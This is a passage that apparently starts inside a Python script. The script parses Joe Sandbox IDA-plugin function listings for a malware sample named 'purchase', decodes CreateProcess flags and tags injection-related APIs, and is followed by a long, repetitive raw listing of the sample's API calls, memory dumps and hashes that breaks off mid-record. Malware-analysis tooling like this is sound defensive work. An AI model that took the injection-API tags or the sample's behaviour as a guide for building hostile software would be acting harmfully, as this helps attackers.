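• API ID: Global$AllocFree
• String ID: 32079
• Instruction Fuzzy Hash: 09218473904610ABD730ABA4DE85A6E72A4AB04328715053FF952B32D4C6BCE8919B5D
APIs
• lstrlenW.KERNEL32(0040B5C8,00000023,00000011,00000002), ref: 004024FA
• RegSetValueExW.ADVAPI32(?,?,?,?,0040B5C8,00000000,00000011,00000002), ref: 0040253A
• RegCloseKey.ADVAPI32(?,?,?,0040B5C8,00000000,00000011,00000002), ref: 00402622
Similarity
• API ID: CloseValuelstrlen
• Instruction Fuzzy Hash: 1611B431D00114BEDB00AFA5DE59AAEB6B4EF44318F20443FF400B61D1C7B88E409668
APIs
• CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
• CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
Similarity
• API ID: CloseCreateHandleProcess
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
FIELD_RE = re.compile(r"•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)")

# Documented Win32 dwCreationFlags bits (only the ones decoded here).
CREATION_FLAGS = {
    0x00000004: "CREATE_SUSPENDED", 0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE", 0x00000200: "CREATE_NEW_PROCESS_GROUP",
    0x00000400: "CREATE_UNICODE_ENVIRONMENT", 0x04000000: "CREATE_DEFAULT_ERROR_MODE",
    0x08000000: "CREATE_NO_WINDOW",
}
# Coarse behaviour tags; labels are this example's assumption, extend as needed.
API_TAGS = {
    "CreateProcessW": "process-creation", "CreateProcessA": "process-creation",
    "RegSetValueExW": "registry-write", "RegSetValueExA": "registry-write",
    "WriteProcessMemory": "foreign-memory-write", "VirtualAllocEx": "foreign-memory-alloc",
    "QueueUserAPC": "apc-queue", "NtQueueApcThread": "apc-queue",
}

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]        # None where the report shows '?'
    ref: int                         # call-site address
    subcall_of: Optional[int] = None # set for "Part of subcall function" lines

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    fields: dict = field(default_factory=dict)
    offset: Optional[int] = None     # image base from the Source File line

    @property
    def api_names(self) -> List[str]:
        return [a.name for a in self.apis]

def _parse_args(s: str) -> List[Optional[int]]:
    return [None if a == "?" else int(a, 16) for a in s.split(",") if a]

def parse_records(text: str) -> List[FunctionRecord]:
    """A record closes at its Instruction Fuzzy Hash line, or at end-of-text
    when the listing is truncated."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                cur.apis.append(ApiCall(m["name"], m["module"], _parse_args(m["args"]),
                                        int(m["ref"], 16), int(m["sub"], 16) if m["sub"] else None))
            continue
        if section == "Strings":
            cur.strings.append(line.lstrip("• "))
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, val = m["key"], m["val"]
        if key == "Source File":
            off = re.search(r"Offset:\s*([0-9A-Fa-f]+)", val)
            cur.offset = int(off.group(1), 16) if off else None
        cur.fields[key] = val
        if key == "Instruction Fuzzy Hash":       # last field of a record
            records.append(cur)
            cur, section = FunctionRecord(), None
    if cur.apis or cur.fields:                    # flush a truncated trailing record
        records.append(cur)
    return records

def tag_record(rec: FunctionRecord) -> List[str]:
    return sorted({API_TAGS[n] for n in rec.api_names if n in API_TAGS})

def creation_flags(rec: FunctionRecord) -> List[str]:
    """Decode dwCreationFlags (6th argument) of every CreateProcess* call in rec."""
    names = set()
    for c in rec.apis:
        if c.name.startswith("CreateProcess") and len(c.args) > 5 and c.args[5] is not None:
            names.update(n for bit, n in CREATION_FLAGS.items() if c.args[5] & bit)
    return sorted(names)

if __name__ == "__main__":
    for r in parse_records(SAMPLE):
        print(r.fields.get("API ID"), r.api_names, tag_record(r), creation_flags(r))
```

Run against the three sample records, the CreateProcessW call decodes to CREATE_DEFAULT_ERROR_MODE only (0x04000000 has neither the CREATE_SUSPENDED nor the CREATE_NO_WINDOW bit set), so the report's "Creates a process in suspended mode" signature is fired by some other call site, not by this function. The same parser runs over a whole exported listing; the "Associated" and "Snapshot File" lines land in the record's fields dict, and the API ID and fuzzy-hash fields give a stable key for grouping the near-identical functions seen earlier on the page.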
                                          APIs
                                          • CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                          • CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID:
                                          • API String ID: 3712363035-0
                                          • Opcode ID: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                          • Instruction ID: 3e6b85693243cf5959e47e0a5ce0ecee53803ede082a99688cf67a66356fc275
                                          • Opcode Fuzzy Hash: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                          • Instruction Fuzzy Hash: 3AE0BFB4A10219BFFB10AB64ED05F7B77BCF704604F418825BD10F2551D774A9148A7C
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: ShowWindow
                                          • String ID:
                                          • API String ID: 1268545403-0
                                          • Opcode ID: cab2a2c0edfac892ff3ce5f7d86d0a7ecd7f2e6ddf1a0654be13e65ecb3d048e
                                          • Instruction ID: ad827bfb45cde9ed8aa1bf7c1acfcc20c377366860c5f8f00bfddef7402fec92
                                          • Opcode Fuzzy Hash: cab2a2c0edfac892ff3ce5f7d86d0a7ecd7f2e6ddf1a0654be13e65ecb3d048e
                                          • Instruction Fuzzy Hash: 52E04F72B11114ABCB18CBA8EDD086E73B6AB54310350453FD502B36A4CA759C418B58
                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                            • Part of subcall function 004068C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
                                            • Part of subcall function 004068C5: wsprintfW.USER32 ref: 00406917
                                            • Part of subcall function 004068C5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                          • String ID:
                                          • API String ID: 2547128583-0
                                          • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                          • Instruction ID: 5f896a6f513cb693e05c26686958cbb9026995673407ad46a654cc37c4de4e39
                                          • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                          • Instruction Fuzzy Hash: BCE0CD73604310EBD61067755D0493773E89F85B50302483EF947F2140D734DC32A7AA
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: File$AttributesCreate
                                          • String ID:
                                          • API String ID: 415043291-0
                                          • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                          • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                          • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                          • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,?,00405C11,?,?,00000000,00405DE7,?,?,?,?), ref: 00406011
                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406025
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                          • Instruction ID: fbd6844141adfc982ff7d741096df028d7bbee698e850df9006aa2ae5f51d9dd
                                          • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                          • Instruction Fuzzy Hash: 24D0C972504221AFC2103728EE0889BBF55DB542717028A35F8A9A22B0CB304C668694
                                          APIs
                                          • CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                          • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B03
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: CreateDirectoryErrorLast
                                          • String ID:
                                          • API String ID: 1375471231-0
                                          • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                          • Instruction ID: c3646108da72950d5b730f2af08982bf7448ccd78712563759f5c9f930c8cbe9
                                          • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                          • Instruction Fuzzy Hash: 11C04C70244906DAD6509B219F0C71779A0EB50781F195839A586E50A0DA34B455D92D
                                          APIs
                                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406405
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                          • Instruction ID: 15c5175e75f921513b7f3d75ccef30e451623c4c54541e9d5ee9eac1385433f3
                                          • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                          • Instruction Fuzzy Hash: 1DE0E6B2010109BFEF195F50DD0AD7B371DEB04310F01492EFE16D4051E6B5E9306674
                                          APIs
                                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040349F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060F7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                          • Instruction ID: b9d802e93a63440494d75fc60edee4ff4d41d1542efeb3ab79d4fb436c6ecda5
                                          • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                          • Instruction Fuzzy Hash: 91E08C3220422AABEF109E909C04EEB3B6CEB003A0F014432FD26E6050D271E9319BA4
                                          APIs
                                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034D1,00000000,00000000,00403328,000000FF,00000004,00000000,00000000,00000000), ref: 004060C8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                          • Instruction ID: 0a9ed9335d9fcbf33a9b7557f86da276afb46ac39f2db62fb679b5cfb923300a
                                          • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                          • Instruction Fuzzy Hash: C1E0BF32250269ABDF109E559C00AAB775CEB05251F014436B955E7150D671E92197A4
                                          APIs
                                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015D3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1473750419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473836494.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1473857959.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1474076538.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 478cb40ad17b728b10cdbf16e79a2720acc2e44bc9a29048479925e3e1a41e6f
                                          • Instruction ID: f0c310d3f6fffa79c82dab7da22db7b00a6fee7441536bfeb36ed7c6a7bf75c0
                                          • Opcode Fuzzy Hash: 478cb40ad17b728b10cdbf16e79a2720acc2e44bc9a29048479925e3e1a41e6f
                                          • Instruction Fuzzy Hash: 94D05B72B08201DBDB00DBE89B48A9F77709B10368F30853BD111F11D4D6B9C945A71D
                                          APIs
                                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                          • Instruction ID: 43b4292f00af6435b8222dbb4ed8e84b3d95e84959177ba0714352b3dfcaa9b9
                                          • Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                          • Instruction Fuzzy Hash: 40C09BF17413017BDA209B509E45F1777989795701F15453D7350F50E0CBB4E450D61D
                                          APIs
                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403267,?), ref: 004034E2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                          • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                          • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                          • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                          APIs
                                          • SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1473809836.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_purchase.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                          • Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
